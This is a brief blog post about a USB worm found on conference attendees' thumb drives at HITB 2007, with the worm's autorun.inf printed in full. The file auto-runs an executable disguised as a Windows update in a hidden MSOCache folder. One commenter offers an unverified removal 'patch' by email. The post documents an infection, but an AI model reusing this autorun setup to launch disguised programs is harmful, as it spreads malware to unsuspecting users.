This is something interesting happened during HITB Conference 2007, all of us brought our own USB thumb drive to ease the file transfer process. After the conference is over, Dhillon told us that his USB thumb drive contains virus and ask us to look into ours, interestingly here's what I have in my thumb drive -
shell>cat autorun.inf
[AutoRun]
open=.\MSOCache\90000804-6000-11D3-8CFE-0150048383C9\KB915865.exe
shellexecute=.\MSOCache\90000804-6000-11D3-8CFE-0150048383C9\KB915865.exe
shell\AutoOpen\command=.\MSOCache\90000804-6000-11D3-8CFE-0150048383C9\KB915865.exe
shell=AutoOpen
shell>file \ MSOCache/90000804-6000-11D3-8CFE-0150048383C9/kb915865.exe
MSOCache/90000804-6000-11D3-8CFE-0150048383C9/kb915865.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
Other crews may also have similar files in their USB thumb drive, therefore if any of you have borrowed USB thumb drive from us, good luck! As most of us are using either linux or osX, we don't even know the malicious files reside in our usb thumb drive.
Thanks to F-Secure sticker, I especially like the quote -
Real Men don't use antivirus.
Good luck to all Windows users in the conference.
Thanks to F-Secure sticker, I especially like the quote -
Real Men don't use antivirus.
Good luck to all Windows users in the conference.
Enjoy ;]
The root cause of this - thanks to the rented PC from whatever hardware provider ..... you should pay our monetary losssss
3 comments:
i still got a bunch of stickers if you want. hehe
--madjack
Gentoo rules!
The virus Autorun MSOCache, doWTP_restore, its deleted with Kaspersky 6.0, I done a patch to eliminate the worm. Simply execute it. I send to everyone who wants it
mandres71@hotmail.com
Post a Comment